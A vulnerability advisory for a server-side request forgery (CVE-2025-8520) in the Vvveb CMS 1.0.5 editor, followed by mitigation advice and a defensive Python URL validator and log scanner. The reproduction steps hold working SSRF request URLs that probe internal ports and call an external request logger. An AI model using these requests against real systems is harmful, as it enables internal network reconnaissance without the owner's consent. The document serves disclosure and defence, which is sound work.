Vvveb - v1.0.5 - Server Side Request Forgery

By 0xhamy 03:31 AM - September 29th 2025
Type software
Product Environment web
Product Name Vvveb
Product Vendor Vvveb
Product Version 1.0.5
Product Link https://github.com/givanz/Vvveb
Vulnerability Name Server Side Request Forgery
Severity Medium
CVSS String CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L
CVSS Score 4.8
CVE ID CVE-2025-8520
Vendor Acknowledgement Yes
Affected Digital Assets 268
Affected Users 26800
Date of Reporting Jan 03, 2025
PoC Exploit -
Credit 0xhamy

Description

The editor endpoint at
/vadmin123/?module=editor/editor&name=
accepts a user-supplied url parameter and attempts to load that URL inside the drag-and-drop editor. The value is used as given (the editor itself passes a protocol-relative value of the form //host/path), so an authenticated user with Editor (or equivalent) privileges can point it at an arbitrary host and port, causing the application to issue requests to internal or external systems. This is a Server-Side Request Forgery (SSRF); because the editor's response differs depending on whether the target answers, it can also be used to probe internal services (internal port scanning) by varying host/port combinations. The functionality is reachable from the regular “Design” / editor UI used to modify posts/pages.


Reproduce

Preconditions: an account with permissions to modify posts/pages (Editor role or equivalent).

  1. Log in as an editor and open the posts list:

    /vadmin123/index.php?module=content/posts&type=post
    
  2. Open any post in Design (drag-and-drop) mode. The editor URL will look similar to:

    http://127.0.0.1/vadmin123/?module=editor/editor&name=Etiam+leo+nibh...&url=//127.0.0.1/hello-world-4&template=content/post.html
    

    (the name value may be URL-encoded and long; it was shortened in testing to simplify URLs).

  3. Modify the url parameter to point at the internal host or resource you want the server to fetch. Examples used during testing:

    • Load local webroot (port 80):

      http://127.0.0.1/vadmin123/?module=editor/editor&name=shorty&url=//127.0.0.1:80/
      
    • Load a specific internal path:

      http://127.0.0.1/vadmin123/?module=editor/editor&name=shorty&url=//127.0.0.1:80/page/contact
      
    • Probe an unused port (port scanning):

      http://127.0.0.1/vadmin123/?module=editor/editor&name=shorty&url=//127.0.0.1:9999/
      

      When the target port is closed, the editor shows an embedding error in the browser, which indicates that no service responded.

  4. To confirm the application actually performs requests, run a local HTTP listener (example):

    php -S 0.0.0.0:10001
    

    Then request:

    http://127.0.0.1/vadmin123/?module=editor/editor&name=shorty&url=//127.0.0.1:10001/
    

    The PHP built-in server logs each incoming connection to its terminal; the editor page renders the error or “not found” message returned by the target. Check the source address of the logged connection: a connection originating from the application server confirms that the fetch is made server-side. Because the browser and the application run on the same host in these examples (both 127.0.0.1), run the listener on a host that only the server can reach when you need an unambiguous result, so that a request made by your own browser is not mistaken for one made by the server.

  5. You can also verify external callbacks by pointing url at an external request logger (e.g., webhook.site):

    http://127.0.0.1/vadmin123/?module=editor/editor&name=shorty&url=//webhook.site/your-id
    

    The webhook service will show the incoming request and the editor will display the webhook’s response (or a “no default content configured” message).

  6. Repeat with different ports/hosts to enumerate reachable internal services (i.e., internal port scan).


Recommendation

  • Canonicalize and validate url: treat the value as a site-relative path or logical template identifier rather than a free-form URL, and reject anything that carries a scheme, a backslash, or a host that is not on an explicit allowlist of known internal content endpoints.
  • Block requests to private and special-purpose address ranges and to localhost from this feature (reject 127.0.0.0/8, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, 169.254.0.0/16, ::1 and fc00::/7) unless explicitly required and access-controlled. Apply the check to every address a hostname resolves to, and either connect to the vetted address or re-validate after each redirect, so that DNS rebinding and redirects cannot bypass it.
  • Restrict editor privileges and audit use: limit who can use the editor URL-loading feature, and log/alert on url values that name unexpected hosts, ports or addresses.
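The allowlist-and-address check from the first two bullets and the log review from the third, as an added Python example (written for this page, not code from the Vvveb project): validate_editor_url accepts only site-relative paths or allowlisted hosts whose every resolved address is public, and scan_access_log applies the same check to editor requests found in combined-format access log lines. The allowlist entry www.example.com, the injectable resolver and the sample log lines are assumptions made for the example.

```python
"""Editor url parameter validation and access-log review.

Added example for this advisory; not Vvveb's own code.
"""
import ipaddress
import re
import socket
from urllib.parse import parse_qs, urlsplit

# Assumption: the only host(s) the editor may legitimately load. Replace with the
# site's own hostname(s); anything else, including literal IPs, is rejected.
ALLOWED_HOSTS = {"www.example.com"}

# Apache/nginx "combined" format, enough of it to recover client IP and request target.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def _blocked_address(ip):
    """True for any address this feature must never fetch on a user's behalf."""
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def _default_resolver(host):
    """Every A/AAAA record for host; all of them must pass, not just the first."""
    return [info[4][0] for info in socket.getaddrinfo(host, None)]


def validate_editor_url(value, resolver=_default_resolver):
    """Return (ok, reason) for a candidate url parameter value.

    Policy: accept a site-relative path (single leading '/'), or an http(s) URL
    whose host is allowlisted and resolves only to public addresses. Anything
    else (other schemes, unknown '//host' authorities, backslashes) is rejected.
    """
    value = value.strip()
    if "\\" in value:
        # Browsers treat "/\evil.example" like "//evil.example"; urlsplit does not.
        return False, "backslash in url"
    parts = urlsplit(value)
    if not parts.scheme and not parts.netloc:
        if value.startswith("/") and not value.startswith("//"):
            return True, "site-relative path"
        return False, "relative path must start with a single '/'"
    if parts.scheme not in ("", "http", "https"):
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if host not in ALLOWED_HOSTS:
        return False, f"host {host!r} not in allowlist"
    try:
        addrs = [ipaddress.ip_address(host)]  # literal IPv4 or bracketed IPv6
    except ValueError:
        try:
            # Resolve it here so forms like 0x7f000001 or a CNAME to 127.0.0.1 are caught.
            addrs = [ipaddress.ip_address(a) for a in resolver(host)]
        except (OSError, ValueError):
            return False, f"could not resolve {host!r}"
    for ip in addrs:
        if _blocked_address(ip):
            return False, f"{host!r} resolves to non-public address {ip}"
    # The caller must connect to one of `addrs` rather than re-resolving, and must
    # re-run this check on every redirect target; otherwise rebinding or a 302 bypasses it.
    return True, "allowlisted public host"


def scan_access_log(lines, resolver=_default_resolver):
    """Return (client, url_value, reason) for editor requests whose url fails validation."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        qs = parse_qs(urlsplit(m.group("target")).query)
        if qs.get("module") != ["editor/editor"] or "url" not in qs:
            continue
        ok, reason = validate_editor_url(qs["url"][0], resolver)
        if not ok:
            hits.append((m.group("client"), qs["url"][0], reason))
    return hits


# Constructed log lines for this example (not real traffic): two probes from the
# advisory, one legitimate relative load, and one unrelated admin request.
SAMPLE_LOG = [
    '203.0.113.10 - - [29/Sep/2025:03:31:00 +0000] "GET /vadmin123/?module=editor/editor&name=shorty&url=//127.0.0.1:9999/ HTTP/1.1" 200 512',
    '203.0.113.10 - - [29/Sep/2025:03:31:05 +0000] "GET /vadmin123/?module=editor/editor&name=shorty&url=%2F%2Fwebhook.site%2Fyour-id HTTP/1.1" 200 812',
    '203.0.113.11 - - [29/Sep/2025:03:32:00 +0000] "GET /vadmin123/?module=editor/editor&name=post&url=/hello-world-4&template=content/post.html HTTP/1.1" 200 9182',
    '203.0.113.12 - - [29/Sep/2025:03:33:00 +0000] "GET /vadmin123/index.php?module=content/posts&type=post HTTP/1.1" 200 4211',
]

if __name__ == "__main__":
    for client, url, reason in scan_access_log(SAMPLE_LOG):
        print(f"{client} {url!r}: {reason}")
```

The allowlist is checked before any DNS lookup, so hosts that are not the site's own are rejected without resolving them and the sample log scan runs offline. The address check still matters for allowlisted names: a hostname on the allowlist that is later pointed at 127.0.0.1 or 10.0.0.0/8 is rejected at that point, which is why the fetch itself must use the vetted address rather than resolving again.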